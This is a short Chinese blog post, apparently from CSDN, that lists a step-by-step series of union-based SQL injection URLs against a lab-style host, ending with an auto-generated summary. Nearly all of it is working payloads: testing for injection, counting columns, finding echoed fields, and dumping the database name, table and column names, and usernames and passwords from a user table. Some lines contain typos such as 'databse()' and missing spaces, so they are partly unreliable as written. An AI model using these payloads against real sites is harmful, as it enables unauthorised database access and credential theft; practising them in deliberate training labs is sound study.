常规SQL注入
测试是否存在SQL注入http://123.1.1.1:1111/less/?id=1’ and 1=1 ;%00
测试字段http://123.1.1.1:1111/less/?id=1’ order by 3 ;%00
测试回显字段http://123.1.1.1:1111/less/?id=1’ union select 1,2,3 ;%00
爆数据库http://123.1.1.1:1111/less/?id=1’ union select 1,database(),3 ;%00
爆数据表http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(table_name),3from information_schema.tables where table_schema=databse() ;%00
爆数据表字段http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(column_name),3from information_schema.columns where table_name=“123” ;%00
获取字段值http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(id,username,password),3 from user ;%00
常规sql注入
于 2023-03-29 10:18:00 首次发布
文章提供了一系列URL示例,用于测试SQL注入漏洞,包括检查注入存在的基础测试,如1=1,通过orderby字段测试回显,利用unionselect来爆库和数据表,以及获取特定表的字段值。这些方法揭示了Web应用程序可能存在的安全问题。
摘要由CSDN通过智能技术生成